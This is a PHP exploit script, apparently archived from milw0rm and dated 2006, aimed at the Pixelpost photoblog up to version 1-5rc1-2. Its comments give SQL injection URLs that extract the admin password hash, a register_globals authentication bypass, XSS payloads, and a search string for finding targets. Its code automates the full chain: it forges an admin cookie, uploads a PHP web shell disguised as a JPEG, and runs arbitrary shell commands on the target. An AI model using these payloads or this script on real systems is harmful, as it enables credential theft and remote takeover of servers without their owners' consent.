384 lines
No EOL
12 KiB
PHP
384 lines
No EOL
12 KiB
PHP
#!/usr/bin/php -q -d short_open_tag=on
|
|
<?
|
|
echo "Pixelpost <= 1-5rc1-2 privilege escalation exploit\r\n";
|
|
echo "by rgod rgod@autistici.org\r\n";
|
|
echo "site: http://retrogod.altervista.org\r\n";
|
|
echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n";
|
|
|
|
/*
|
|
works with:
|
|
magic_quotes_gpc=Off
|
|
*/
|
|
|
|
if ($argc<5) {
|
|
echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n";
|
|
echo "host: target server (ip/hostname)\r\n";
|
|
echo "path: path to pixelpost\r\n";
|
|
echo "your ip: your actual ip adress, we need it to build an admin cookie\r\n";
|
|
echo " this is automatically set to your proxy ip if you use one\r\n";
|
|
echo "cmd: a shell command\r\n";
|
|
echo "Options:\r\n";
|
|
echo " -T[prefix] specify a table prefix different from \"pixelpost_\"\r\n";
|
|
echo " -p[port]: specify a port other than 80\r\n";
|
|
echo " -P[ip:port]: specify a proxy\r\n";
|
|
echo "Examples:\r\n";
|
|
echo "php ".$argv[0]." a.b.c.d /pixelpost/ w.x.y.z cat ./../includes/pixelpost.php\r\n";
|
|
echo "php ".$argv[0]." a.b.c.d / w.x.y.z ls -la -p81\r\n";
|
|
echo "php ".$argv[0]." a.b.c.d / none ls -la -P1.1.1.1:80\r\n";
|
|
die;
|
|
}
|
|
/* software site: http://www.pixelpost.org/
|
|
|
|
description: "A small photoblog application that's a no-brainer to set up and
|
|
use - this is truly for anyone wishing regularly to post their photos on the
|
|
web like a blog."
|
|
|
|
-----
|
|
|
|
i) sql injection in index.php near lines 670-680:
|
|
|
|
...
|
|
if($_GET['category'] != "")
|
|
{
|
|
// Modified from Mark Lewin's hack for multiple categories
|
|
$query = mysql_query("SELECT 1,t2.id,headline,image,datetime
|
|
FROM {$pixelpost_db_prefix}catassoc as t1
|
|
INNER JOIN {$pixelpost_db_prefix}pixelpost t2 on t2.id = t1.image_id
|
|
WHERE t1.cat_id = '".$_GET['category']."'
|
|
AND (datetime<='$cdate')
|
|
ORDER BY datetime DESC");
|
|
$lookingfor = 1;
|
|
}
|
|
...
|
|
|
|
nice code, isn't it?
|
|
|
|
with magic_quotes_gpc = Off:
|
|
http://[target]/[path]/index.php?x=browse&category='UNION SELECT '1','2',admin,'4','5' FROM pixelpost_config WHERE id=1/*
|
|
http://[target]/[path]/index.php?x=browse&category='UNION SELECT '1','2',password,'4','5' FROM pixelpost_config WHERE id=1/*
|
|
|
|
now, at screen, you have admin username & MD5 password hash and you can build
|
|
an admin cookie:
|
|
|
|
Cookie: pp_user=[username]; pp_password=[sha1([md5hash].[your_ip_address])];
|
|
|
|
Admin can upload .php files in images/ folder, files are renamed but you can
|
|
see new filename in main index page, so... you launch commands:
|
|
|
|
http://[target]/[path]/images/20060603005716_suntzu.php?cmd=cat%20./../includes/pixelpost.php
|
|
|
|
ii) same kind of sql injection in 'archivedate' argument at lines 681-687:
|
|
...
|
|
ELSE IF ($_GET['archivedate'] != "")
|
|
{
|
|
|
|
$where = "AND (DATE_FORMAT(datetime, '%Y-%m')='".$_GET['archivedate']."')"; //DATE_FORMAT(foo, '%Y-%m-%d')
|
|
$query = mysql_query("SELECT 1,id,headline,image, datetime FROM ".$pixelpost_db_prefix."pixelpost WHERE (datetime<='$cdate') $where ORDER BY datetime desc");
|
|
$lookingfor = 1;
|
|
}
|
|
...
|
|
poc:
|
|
|
|
http://[target]/[path]/index.php?x=browse&archivedate=')%20UNION%20SELECT%20'1','2',password,'4','5'%20FROM%20pixelpost_config/*
|
|
|
|
iii)
|
|
in admin/ folder at the begin of every script, except for index.php, we have:
|
|
|
|
<?php
|
|
if(!isset($_SESSION["pixelpost_admin"]) || $cfgrow['password'] != $_SESSION["pixelpost_admin"]) {
|
|
die ("Try another day!!");
|
|
}
|
|
...
|
|
|
|
if register_globals= On, you can easily bybass this protection, poc:
|
|
|
|
http://[target]/]path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1
|
|
|
|
this can be used to see some interesting configuration info about target server:
|
|
|
|
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info
|
|
|
|
or to launch XSS attacks:
|
|
|
|
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif1=<script>alert(document.cookie)</script>
|
|
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=<script>alert(document.cookie)</script>
|
|
http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=<script>alert(document.cookie)</script>
|
|
|
|
iv) another xss, without to be logged in:
|
|
http://[target]/[path]/admin/index.php?loginmessage="><script>window.open("http://retrogod.altervista.org")</script>
|
|
|
|
*/
|
|
error_reporting(0);
|
|
ini_set("max_execution_time",0);
|
|
ini_set("default_socket_timeout",5);
|
|
|
|
function quick_dump($string)
|
|
{
|
|
$result='';$exa='';$cont=0;
|
|
for ($i=0; $i<=strlen($string)-1; $i++)
|
|
{
|
|
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
|
{$result.=" .";}
|
|
else
|
|
{$result.=" ".$string[$i];}
|
|
if (strlen(dechex(ord($string[$i])))==2)
|
|
{$exa.=" ".dechex(ord($string[$i]));}
|
|
else
|
|
{$exa.=" 0".dechex(ord($string[$i]));}
|
|
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
|
}
|
|
return $exa."\r\n".$result;
|
|
}
|
|
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
|
function sendpacketii($packet)
|
|
{
|
|
global $proxy, $host, $port, $html, $proxy_regex;
|
|
if ($proxy=='') {
|
|
$ock=fsockopen(gethostbyname($host),$port);
|
|
if (!$ock) {
|
|
echo 'No response from '.$host.':'.$port; die;
|
|
}
|
|
}
|
|
else {
|
|
$c = preg_match($proxy_regex,$proxy);
|
|
if (!$c) {
|
|
echo 'Not a valid proxy...';die;
|
|
}
|
|
$parts=explode(':',$proxy);
|
|
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
|
$ock=fsockopen($parts[0],$parts[1]);
|
|
if (!$ock) {
|
|
echo 'No response from proxy...';die;
|
|
}
|
|
}
|
|
fputs($ock,$packet);
|
|
if ($proxy=='') {
|
|
$html='';
|
|
while (!feof($ock)) {
|
|
$html.=fgets($ock);
|
|
}
|
|
}
|
|
else {
|
|
$html='';
|
|
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
|
$html.=fread($ock,1);
|
|
}
|
|
}
|
|
fclose($ock);
|
|
#debug
|
|
#echo "\r\n".$html;
|
|
|
|
}
|
|
|
|
function is_hash($hash)
|
|
{
|
|
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
|
|
else {return false;}
|
|
}
|
|
|
|
function make_seed()
|
|
{
|
|
list($usec, $sec) = explode(' ', microtime());
|
|
return (float) $sec + ((float) $usec * 100000);
|
|
}
|
|
|
|
$host=$argv[1];
|
|
$path=$argv[2];
|
|
$your_ip=$argv[3];
|
|
$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";
|
|
|
|
for ($i=4; $i<=$argc-1; $i++){
|
|
$temp=$argv[$i][0].$argv[$i][1];
|
|
if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))
|
|
{$cmd.=" ".$argv[$i];}
|
|
if ($temp=="-p")
|
|
{
|
|
$port=str_replace("-p","",$argv[$i]);
|
|
}
|
|
if ($temp=="-P")
|
|
{
|
|
$proxy=str_replace("-P","",$argv[$i]);
|
|
}
|
|
if ($temp=="-T")
|
|
{
|
|
$table_prefix=str_replace("-T","",$argv[$i]);
|
|
}
|
|
}
|
|
$cmd=urlencode($cmd);
|
|
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
|
|
if ($proxy=='') {$p=$path;} else
|
|
{
|
|
$p='http://'.$host.':'.$port.$path;
|
|
$temp=explode(":",$proxy);
|
|
$your_ip=$temp[0];
|
|
}
|
|
|
|
echo "Trying sql injection in 'category' argument...\r\n";
|
|
$sql="'/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
|
|
$sql=urlencode($sql);
|
|
$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("alt=\"",$html);
|
|
$temp2=explode("\"",$temp[1]);
|
|
$hash=trim($temp2[0]);
|
|
if (is_hash($hash)){
|
|
echo "admin md5 password hash -> ".$hash."\r\n";
|
|
$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
|
|
$sql=urlencode($sql);
|
|
$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("alt=\"",$html);
|
|
$temp2=explode("\"",$temp[1]);
|
|
$admin=trim($temp2[0]);
|
|
echo " \" username -> ".$admin."\r\n";
|
|
}
|
|
else { echo "Trying with 'archivedate' argument...\r\n";
|
|
$sql="')/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
|
|
$sql=urlencode($sql);
|
|
$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("alt=\"",$html);
|
|
$temp2=explode("\"",$temp[1]);
|
|
$hash=trim($temp2[0]);
|
|
if (is_hash($hash)){
|
|
echo "admin md5 password hash -> ".$hash."\r\n";
|
|
}
|
|
else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}
|
|
|
|
$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
|
|
$sql=urlencode($sql);
|
|
$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("alt=\"",$html);
|
|
$temp2=explode("\"",$temp[1]);
|
|
$admin=trim($temp2[0]);
|
|
echo " \" username -> ".$admin."\r\n";
|
|
}
|
|
|
|
$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";
|
|
$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Cookie: ".$cookie."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("Set-Cookie: ",$html);
|
|
$cookie="";
|
|
for ($i=1; $i<=count($temp); $i++)
|
|
{
|
|
$temp2=explode(" ",$temp[$i]);
|
|
$cookie.=" ".$temp2[0];
|
|
}
|
|
echo "admin cookie ->".$cookie."\r\n";
|
|
|
|
$shell=
|
|
'<?php
|
|
if (get_magic_quotes_gpc()){$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}
|
|
ini_set("max_execution_time",0);
|
|
error_reporting(0);
|
|
echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
|
|
passthru($_REQUEST["cmd"]);
|
|
echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
|
|
?>';
|
|
srand(make_seed());
|
|
$anumber = rand(1,99999);
|
|
$my_file="suntzu".$anumber.".php";
|
|
$data='
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="headline"
|
|
|
|
Under Costruction... - Admin.
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="category[]"
|
|
|
|
1
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="body"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="autodate"
|
|
|
|
3
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="post_year"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="post_month"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="post_day"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="post_hour"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="post_minute"
|
|
|
|
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"
|
|
Content-Type: image/jpeg
|
|
|
|
'.$shell.'
|
|
-----------------------------7d6318101b00a2
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
Upload
|
|
-----------------------------7d6318101b00a2--
|
|
';
|
|
|
|
$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";
|
|
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Content-Length: ".strlen($data)."\r\n";
|
|
$packet.="Cookie: ".$cookie."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
$packet.=$data;
|
|
sendpacketii($packet);
|
|
|
|
$packet="GET ".$p."index.php HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
$temp=explode("img src=\"",$html);
|
|
$temp2=explode(" ",$temp[1]);
|
|
for ($i=1; $i<=count($temp); $i++)
|
|
{
|
|
$temp2=explode("\"",$temp[$i]);
|
|
if (eregi($my_file,$temp2[0]))
|
|
{
|
|
$my_path=$temp2[0];
|
|
echo "shell -> ".$my_path."\r\n";
|
|
break;
|
|
}
|
|
}
|
|
|
|
$packet="GET ".$p.$my_path." HTTP/1.0\r\n";
|
|
$packet.="Host: ".$host."\r\n";
|
|
$packet.="Cookie: cmd=".$cmd.";\r\n";
|
|
$packet.="Connection: Close\r\n\r\n";
|
|
sendpacketii($packet);
|
|
if (strstr($html,"*deli*"))
|
|
{
|
|
$temp=explode("*deli*",$html);
|
|
die("Exploit succeeded...\r\n".$temp[1]);
|
|
}
|
|
else
|
|
{
|
|
echo "Failed to launch commands...";
|
|
}
|
|
?>
|
|
|
|
# milw0rm.com [2006-06-03]
|